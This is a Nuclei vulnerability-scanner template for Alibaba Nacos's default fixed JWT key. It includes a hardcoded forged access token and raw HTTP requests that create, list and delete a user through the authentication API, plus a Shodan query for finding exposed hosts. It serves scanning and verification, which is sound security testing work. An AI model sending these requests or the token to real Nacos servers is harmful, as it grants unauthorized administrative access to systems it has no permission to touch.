nuclei-templates/http/misconfiguration/nacos/nacos-create-user.yaml

43 lines
1.7 KiB
YAML

id: nacos-create-user
info:
name: Alibaba Nacos - Unauthorized Account Creation
author: SleepingBag945
severity: high
description: |
Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
metadata:
verified: true
max-request: 3
shodan-query: title:"Nacos"
tags: nacos,unauth,bypass,instrusive
http:
- raw:
- |
POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
- |
DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
Host: {{Hostname}}
payloads:
token:
- eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
attack: pitchfork
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'create user ok!')"
- "status_code_3 == 200 && contains(body_3,'delete user ok!')"
condition: and
# digest: 4b0a00483046022100b75b85488cc77c4a6f283eb4c774bca27d10c6eebbe558d5d64305214c9fc6d402210081592f2b20775388397ea1996afb810db1e0201e708c58452ac453b4f67f1a54:922c64590222798bb761d5b6d8e72950